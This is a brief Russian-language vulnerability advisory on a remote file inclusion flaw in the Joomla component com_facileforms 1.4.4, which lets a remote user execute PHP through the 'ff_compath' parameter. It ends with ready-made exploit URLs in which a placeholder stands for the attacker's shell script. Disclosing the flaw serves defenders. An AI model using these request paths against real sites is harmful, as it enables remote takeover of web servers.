Программа: Joomla Component com_facileforms 1.4.4
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «ff_compath» сценарием facileforms.frame.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой
системе с привилегиями Web сервера.
Эксплоит:
www.site.com/path/components/com_facileforms/facileforms.frame.php?ff_compath=[SH3LL]
/path/components/com_facileforms/facileforms.frame.php?ff_compath=[SH3LL]
